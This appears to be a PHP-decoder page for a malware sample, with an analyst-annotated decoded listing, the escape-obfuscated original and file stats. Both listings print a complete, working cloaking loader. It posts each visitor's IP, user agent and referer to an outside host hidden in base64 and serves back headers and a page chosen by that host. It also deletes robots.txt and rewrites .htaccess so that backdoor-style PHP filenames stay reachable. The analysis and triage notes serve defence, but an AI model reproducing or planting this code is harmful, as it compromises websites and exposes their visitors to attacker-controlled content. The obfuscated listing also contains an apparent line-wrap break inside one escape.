
PHP Decode

<?php goto ndrZ7; T5RG_: if ($params["\151\160"] == null) { $params["\151\160"] = ''; } ..

Decoded Output download

<?php 
/*
 * Analyst notes for the decoded sample.
 *
 * Control flow is threaded through goto labels, so the textual order of the
 * statements below is NOT the execution order. Following the gotos gives:
 *
 *   ndrZ7 -> lziNk -> GdnCm -> Iy8zp -> b_wIq -> CnFYB -> qf9C0 -> JySFN
 *         -> T5RG_ -> vTHzS -> OMcgg -> ErMjS -> DPjD9 -> szkQw -> aTlUC -> hlnSm
 *
 * What each label does:
 *
 *   ndrZ7  Declares h($url, $pf): a cURL helper. It sets User-Agent "h", a
 *          30 second timeout and CURLOPT_FRESH_CONNECT, switches to POST when
 *          $pf != '' (form-encoding $pf when it is an array), and returns the
 *          response body, or '' when curl_exec() gives a falsy result.
 *   lziNk  Declares h2(): deletes robots.txt from the current directory if it
 *          exists, then compares .htaccess with an embedded base64 payload.
 *          If they differ (or the file is missing) it chmods the file to 511
 *          (octal 0777), overwrites it, and chmods it to 420 (octal 0644).
 *          Every filesystem call is @-silenced, so failures leave no warning.
 *   GdnCm  $api is base64-decoded from a literal. Decoded by hand it reads
 *          hxxp://5586-ch4-v108[.]likakid[.]com (defanged here on purpose).
 *   Iy8zp, b_wIq, CnFYB, qf9C0, JySFN, T5RG_, vTHzS, OMcgg
 *          Build $params from the current request: domain, request_url,
 *          referer, agent, ip, protocol, language. The ip value is read from
 *          HTTP_X_FORWARDED_FOR only when HTTP_VIA is set, otherwise from
 *          REMOTE_ADDR; a null result is normalised to ''.
 *   ErMjS  If the request carries a "params" parameter, the script adds the
 *          endpoint to $params, dumps the array with print_r() and exits.
 *          No authentication check is visible on this path.
 *   DPjD9  Calls h2(), i.e. the robots.txt / .htaccess tampering runs on every
 *          request that reaches this point.
 *   szkQw, aTlUC
 *          Up to three attempts: POST $params to $api, base64-decode and
 *          gzuncompress() the reply, split it on "|". The last field is
 *          base64-decoded and echoed; every preceding field is passed to
 *          header(). The script then dies. The remote host therefore decides
 *          both the response headers and the body served to the visitor.
 *   hlnSm  Reached only when all three attempts produce nothing; the script
 *          then ends without output of its own.
 *
 * Embedded .htaccess payload (decoded by hand from the literal in h2();
 * verify against the raw sample):
 *   - FilesMatch ".(py|exe|php)$"            -> Order allow,deny / Deny from all
 *   - FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|
 *                   admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|
 *                   wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$"
 *                                            -> Order allow,deny / Allow from all
 *   - mod_rewrite block sending every request that is not an existing file or
 *     directory to /index.php.
 *
 * NOTE(review): the overall shape (visitor fingerprint sent out, remote-chosen
 * headers and body sent back, robots.txt removed, rewrite rules forced) looks
 * like a content-injection / cloaking loader. That classification is inferred
 * from the code, not stated on the page.
 *
 * Triage pointers grounded in the code above:
 *   - robots.txt missing and .htaccess matching the payload, mode 0644.
 *   - Outbound HTTP POSTs from the web server with User-Agent "h".
 *   - Restoring .htaccess alone does not hold: h2() rewrites it on the next
 *     request, so the script itself has to be removed first.
 */
 goto ndrZ7; T5RG_: if ($params["ip"] == null) { $params["ip"] = ''; } goto vTHzS; szkQw: $try = 0; goto aTlUC; Iy8zp: $params["domain"] = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto b_wIq; JySFN: $params["ip"] = isset($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; goto T5RG_; aTlUC: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto hlnSm; vTHzS: $params["protocol"] = isset($_SERVER["HTTPS"]) ? "https://" : "http://"; goto OMcgg; b_wIq: $params["request_url"] = $_SERVER["REQUEST_URI"]; goto CnFYB; ErMjS: if (isset($_REQUEST["params"])) { $params["api"] = $api; print_r($params); die; } goto DPjD9; DPjD9: h2(); goto szkQw; lziNk: function h2() { if (file_exists("robots" . ".txt")) { @unlink("robots" . ".txt"); } $htaccess = "." . 
"htaccess"; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto GdnCm; CnFYB: $params["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; goto qf9C0; qf9C0: $params["agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; goto JySFN; GdnCm: $api = base64_decode("aHR0cDovLzU1ODYtY2g0LXYxMDgubGlrYWtpZC5jb20="); goto Iy8zp; ndrZ7: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "h"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto lziNk; OMcgg: $params["language"] = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; goto ErMjS; hlnSm: ?>


Original Code

<?php
/*
 * Obfuscated form of the sample, as submitted.
 *
 * Two layers are visible in this listing:
 *   1. Every string literal (array keys, $_SERVER indexes, file names, the two
 *      base64 payloads, the preg_split pattern, the User-Agent) is written as
 *      a mix of octal (\151) and hex (\x64) escapes inside double quotes.
 *   2. The statements are shuffled and stitched back together with goto
 *      labels, so reading top to bottom does not follow execution.
 *
 * PHP resolves the escapes when it parses the file, so the script contains no
 * eval() and no decoder stub; the page reports Eval Count 0 for this sample.
 * The "Decoded Output" listing on this page is this code with the escapes
 * resolved.
 *
 * NOTE(review): inside the long base64 literal passed to base64_decode() in
 * h2(), this listing breaks a line in the middle of an escape sequence: one
 * line ends with "\15" and the next starts with "5". That looks like a
 * line-wrap artifact of the page rather than part of the sample; confirm
 * against the raw file before hashing it or comparing it with the MD5 shown
 * on the page.
 *
 * Static-detection hint grounded in this listing: long runs of \NNN / \xNN
 * escapes used as $_SERVER keys, combined with goto labels around
 * curl_exec(), header() and file_put_contents() calls.
 */
 goto ndrZ7; T5RG_: if ($params["\151\160"] == null) { $params["\151\160"] = ''; } goto vTHzS; szkQw: $try = 0; goto aTlUC; Iy8zp: $params["\x64\x6f\x6d\x61\151\156"] = isset($_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\x54"]) ? $_SERVER["\110\x54\124\120\137\x48\x4f\x53\124"] : $_SERVER["\123\105\x52\x56\105\x52\x5f\116\x41\x4d\105"]; goto b_wIq; JySFN: $params["\x69\x70"] = isset($_SERVER["\x48\x54\124\x50\137\126\111\x41"]) ? $_SERVER["\x48\124\x54\x50\137\130\137\106\117\122\x57\101\122\104\x45\104\x5f\x46\117\122"] : $_SERVER["\x52\x45\x4d\117\x54\x45\137\101\104\104\x52"]; goto T5RG_; aTlUC: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\134\174\57\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto hlnSm; vTHzS: $params["\x70\162\x6f\x74\157\x63\x6f\x6c"] = isset($_SERVER["\x48\x54\124\x50\123"]) ? "\150\x74\x74\x70\x73\72\57\57" : "\x68\x74\164\x70\72\57\57"; goto OMcgg; b_wIq: $params["\x72\145\x71\165\x65\163\x74\x5f\x75\x72\x6c"] = $_SERVER["\x52\x45\121\125\105\x53\124\137\x55\122\111"]; goto CnFYB; ErMjS: if (isset($_REQUEST["\x70\141\x72\x61\x6d\x73"])) { $params["\141\160\x69"] = $api; print_r($params); die; } goto DPjD9; DPjD9: h2(); goto szkQw; lziNk: function h2() { if (file_exists("\x72\157\142\157\x74\x73" . "\x2e\x74\x78\164")) { @unlink("\162\157\x62\157\164\x73" . "\x2e\x74\x78\164"); } $htaccess = "\56" . 
"\150\x74\x61\x63\143\145\x73\x73"; $content = @base64_decode("\x50\x45\x5a\160\x62\x47\126\x7a\124\127\x46\60\131\62\147\x67\111\151\x34\x6f\143\x48\x6c\70\x5a\130\150\154\146\110\102\x6f\143\x43\153\153\x49\152\64\113\x49\x45\71\171\x5a\107\x56\171\x49\107\106\x73\x62\x47\71\63\114\x47\122\x6c\142\156\153\113\x49\x45\122\x6c\142\x6e\x6b\x67\x5a\156\112\166\x62\123\102\x68\x62\107\167\x4b\120\x43\x39\107\141\127\x78\154\143\60\61\150\144\x47\x4e\x6f\x50\147\x6f\70\x52\155\x6c\163\x5a\x58\x4e\x4e\x59\x58\x52\x6a\141\x43\x41\x69\130\151\x68\x68\x59\x6d\71\61\144\103\x35\x77\141\110\x42\70\x63\155\106\153\x61\x57\70\x75\143\107\150\x77\146\x47\154\165\x5a\x47\126\64\114\x6e\x42\157\143\x48\170\x6a\142\62\x35\60\x5a\127\x35\60\114\156\102\157\x63\110\x78\163\x62\x32\116\x72\x4d\172\x59\167\114\x6e\102\x6f\143\110\170\x68\132\107\61\160\142\x69\x35\x77\x61\110\x42\x38\x64\x33\101\x74\142\x47\x39\x6e\141\x57\64\x75\x63\107\x68\x77\x66\110\x64\x77\x4c\x57\x77\x77\x5a\x32\x6c\x75\114\156\x42\157\143\110\170\x33\143\x43\x31\x30\x61\107\126\164\x5a\x53\x35\x77\141\x48\102\x38\144\63\x41\164\x63\x32\116\x79\x61\x58\102\60\143\x79\65\167\x61\x48\x42\70\144\x33\101\164\132\x57\122\x70\144\x47\71\x79\114\x6e\x42\157\x63\110\x78\164\x59\127\x67\x75\x63\107\x68\167\146\x47\160\x77\x4c\x6e\102\x6f\143\x48\170\154\145\110\121\165\x63\x47\150\167\113\123\121\151\x50\147\x6f\x67\124\63\x4a\x6b\x5a\x58\x49\x67\x59\x57\170\163\142\63\143\163\x5a\107\x56\x75\x65\x51\157\x67\121\127\x78\x73\142\63\x63\x67\132\x6e\112\166\142\123\102\x68\x62\x47\167\113\x50\103\71\x47\141\x57\x78\x6c\143\60\61\150\x64\x47\116\157\x50\x67\x6f\70\x53\127\132\116\142\x32\122\61\142\107\125\147\x62\x57\x39\153\130\63\112\x6c\144\x33\112\x70\x64\107\125\x75\x59\x7a\64\113\x55\x6d\126\x33\143\x6d\154\60\132\x55\126\x75\x5a\62\x6c\165\132\x53\x42\x50\142\x67\160\123\x5a\130\x64\x79\x61\130\122\x6c\x51\155\x46\172\x5a\x53\x41\x76\103\x6c\x4a\154\144\63\x4a\160\144\x47\126\123\x64\127\170\154\x49\x46\x35\x70\142\15
5\x52\x6c\x65\x46\x77\x75\x63\107\150\x77\112\103\x41\x74\x49\x46\x74\115\130\x51\160\123\132\130\144\x79\141\x58\122\x6c\x51\62\71\165\132\x43\101\x6c\x65\61\x4a\x46\x55\x56\126\106\x55\x31\122\x66\x52\153\154\115\122\x55\x35\x42\x54\125\x56\71\111\103\x45\164\x5a\147\x70\123\x5a\130\x64\171\141\130\x52\x6c\121\62\x39\x75\132\x43\x41\154\145\61\x4a\x46\x55\x56\x56\106\125\61\122\x66\x52\x6b\154\x4d\122\125\65\x42\x54\x55\126\x39\111\x43\x45\164\132\101\x70\123\x5a\x58\x64\171\x61\130\122\154\125\x6e\x56\163\x5a\123\x41\165\111\103\71\160\x62\155\122\x6c\145\103\x35\167\x61\x48\x41\147\127\60\x78\x64\x43\x6a\x77\166\x53\127\132\x4e\x62\62\122\x31\142\x47\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto GdnCm; CnFYB: $params["\162\145\x66\145\x72\145\x72"] = isset($_SERVER["\110\x54\124\120\x5f\x52\105\106\105\122\x45\x52"]) ? $_SERVER["\x48\124\x54\120\137\x52\105\x46\105\122\x45\x52"] : ''; goto qf9C0; qf9C0: $params["\x61\x67\x65\x6e\x74"] = isset($_SERVER["\x48\x54\124\120\137\125\x53\x45\122\x5f\101\107\x45\116\124"]) ? 
$_SERVER["\x48\x54\x54\x50\x5f\125\123\x45\122\x5f\x41\x47\105\116\x54"] : ''; goto JySFN; GdnCm: $api = base64_decode("\141\x48\122\60\x63\x44\157\x76\x4c\x7a\x55\61\117\104\131\164\x59\62\x67\60\x4c\130\x59\170\115\104\x67\x75\x62\x47\154\162\131\x57\164\160\132\x43\65\152\142\x32\x30\x3d"); goto Iy8zp; ndrZ7: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto lziNk; OMcgg: $params["\154\x61\x6e\x67\165\141\147\x65"] = isset($_SERVER["\110\124\124\120\x5f\x41\103\x43\x45\120\124\x5f\x4c\101\x4e\107\x55\x41\107\105"]) ? $_SERVER["\110\x54\124\120\x5f\x41\103\x43\105\x50\x54\137\x4c\x41\x4e\107\x55\x41\107\105"] : ''; goto ErMjS; hlnSm: ?>

Function Calls

None

Variables

None

Stats

MD5 cacc6f5a993573b5c727934674cd7b57
Eval Count 0
Decode Time 70 ms